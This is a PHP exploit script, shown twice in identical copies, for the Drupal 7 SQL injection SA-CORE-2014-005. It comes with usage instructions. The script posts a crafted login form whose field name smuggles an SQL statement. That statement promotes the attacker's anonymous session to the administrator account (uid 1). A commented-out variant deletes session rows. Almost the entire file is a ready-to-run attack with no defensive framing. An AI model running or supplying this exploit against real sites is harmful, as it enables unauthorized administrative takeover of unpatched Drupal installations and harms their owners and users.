lgrtm/d7-autologin.php

## d7-autologin.php
<?php

/**
 * D7 autologin.
 * Exploits SA-CORE-2014-005 to change your anonymous session into an uid 1 session.
 * In order to work, first you need to have an anonymous session in the sessions table.
 * One way to achieve this is to go to the update.php page.
 *
 * Usage: php d7-autologin.php http://example.com 127.0.0.1
 *
 * Change the IP with your IP address.
 * After that, you should have access to the site by refreshing the page.
 *
 * This script is based on the one found here:
 * http://drupal.stackexchange.com/questions/133795/what-kind-of-attacks-does-the-patch-for-sa-core-2014-005-drupal-7-32-prevent
 */

$url = $argv[1];
$hostname = $argv[2];

echo "Usage: php script.php http://example.com [Your IP address]

This script works updating the sessions table. For that, you need to create a session in the DB as an anonymous. An easy way is to get an access denied on the update.php page. Just go to:
";
echo $url . "/update.php
";

$post_data = "name[0%20;update+sessions+set+uid%3D1+where+hostname+%3D+'$hostname';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
//$post_data = "name[0%20;delete+from+sessions+where+hostname+%3D+'$hostname';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";

$params = array(
  'http' => array(
    'method' => 'POST',
    'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
    'content' => $post_data
  )
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);

if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  echo "Success! Just refresh the update.php page you loaded before.
";
}
else {
  echo "Error! Either the website isn't vulnerable, or your Internet isn't working.
";
}
	<?php

	/**
	* D7 autologin.
	* Exploits SA-CORE-2014-005 to change your anonymous session into an uid 1 session.
	* In order to work, first you need to have an anonymous session in the sessions table.
	* One way to achieve this is to go to the update.php page.
	*
	* Usage: php d7-autologin.php http://example.com 127.0.0.1
	*
	* Change the IP with your IP address.
	* After that, you should have access to the site by refreshing the page.
	*
	* This script is based on the one found here:
	* http://drupal.stackexchange.com/questions/133795/what-kind-of-attacks-does-the-patch-for-sa-core-2014-005-drupal-7-32-prevent
	*/

	$url = $argv[1];
	$hostname = $argv[2];

	echo "Usage: php script.php http://example.com [Your IP address]

	This script works updating the sessions table. For that, you need to create a session in the DB as an anonymous. An easy way is to get an access denied on the update.php page. Just go to:
	";
	echo $url . "/update.php
	";

	$post_data = "name[0%20;update+sessions+set+uid%3D1+where+hostname+%3D+'$hostname';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
	//$post_data = "name[0%20;delete+from+sessions+where+hostname+%3D+'$hostname';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";

	$params = array(
	'http' => array(
	'method' => 'POST',
	'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
	'content' => $post_data
	)
	);
	$ctx = stream_context_create($params);
	$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);

	if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
	echo "Success! Just refresh the update.php page you loaded before.
	";
	}
	else {
	echo "Error! Either the website isn't vulnerable, or your Internet isn't working.
	";
	}